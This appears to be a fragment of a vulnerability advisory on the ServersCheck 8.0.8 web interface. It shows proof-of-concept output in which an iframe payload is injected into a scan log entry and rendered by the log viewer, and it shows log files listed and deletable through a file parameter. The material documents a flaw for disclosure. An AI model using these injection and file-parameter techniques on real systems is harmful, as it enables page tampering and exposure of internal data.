1.4
Code Review: Local Directory Traversal & Information Disclosure
http://www.example.com/viewlogfile2.html?file=scan.txt&
<body bgcolor="white" leftmargin=0 topmargin=0 rightmargin=0 marginwidth=0>
<div style=&#039;padding-left:5px;padding-top:5px;&#039;><font color=black
style="font-size: 16px;"><strong>
ServersCheck Protokolldateibetrachter: scan.txt
</strong></font>
<hr align="left" width="97%" size="1" color="#ff9900" noshade
style="padding-top:0px;
filter:progid:DXImageTransform.Microsoft.Gradient(startColorStr=&#039;#ffcc00&#039;,
endColorStr=&#039;white&#039;, gradientType=&#039;1&#039;)"><br>
<a href="/emptyfile.html?file=logging\scan.txt&">Leere Datei</a>
<a href="/emptyfile.html?file=logging\scan.txt&delete=true&">Löschen
Protokolldatei</a>
<hr noshade width=100%><ul><font color=black>
# Fri Mar 19 17:37:52 2010 Scanning ><iframe
src=http://vulnerability-lab.com width=600 height=600>..: Ping Failed
<br></font></ul></div><br><br> </BODY></HTML>
or ...
<HTML>
<HEAD>
<TITLE>ServersCheck 21 Day Evaluation Edition - version 8.0.8</TITLE>
<META http-equiv=content-type content="text/html">
<LINK HREF="/output/css/serverscheck.css" rel="stylesheet" type="text/css">
<LINK HREF="/output/css/thickbox.css" rel="stylesheet" type="text/css"
media="screen" />
<script type="text/javascript" src="/output/js/jquery.js"></script>
<script type="text/javascript" src="/output/js/thickbox.js"></script>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
</HEAD><!-- DE -->
<body bgcolor="white" leftmargin=0 topmargin=0 rightmargin=0 marginwidth=0>
<div style=&#039;padding-left:5px;padding-top:5px;&#039;><font color=black
style="font-size: 16px;"><strong>
ServersCheck Protokolldateien</strong></font>
<hr align="left" width="97%" size="1" color="#ff9900" noshade
style="padding-top:0px; filter:progid:DXImageTransform.Microsoft.
Gradient(startColorStr=&#039;#ffcc00&#039;, endColorStr=&#039;white&#039;,
gradientType=&#039;1&#039;)"><br>
Um die Protokolldatei anzusehen, klicken Sie auf den Hyperlink, um sie
zu öffnen.<br><ul>
<li><a
href="/viewlogfile2.html?file=graphs-errors.log&">graphs-errors.log</a></li>
<li><a
href="/viewlogfile2.html?file=monitoring_manager_2010-3-19.log&">monitoring_manager_2010-3-19.log</a></li>
<li><a
href="/viewlogfile2.html?file=statuschange_2010-3-19.log&">statuschange_2010-3-19.log</a></li>
<li><a href="/viewlogfile2.html?file=watcher.log&">watcher.log</a></li>
</ul></div><br><br> </BODY></HTML>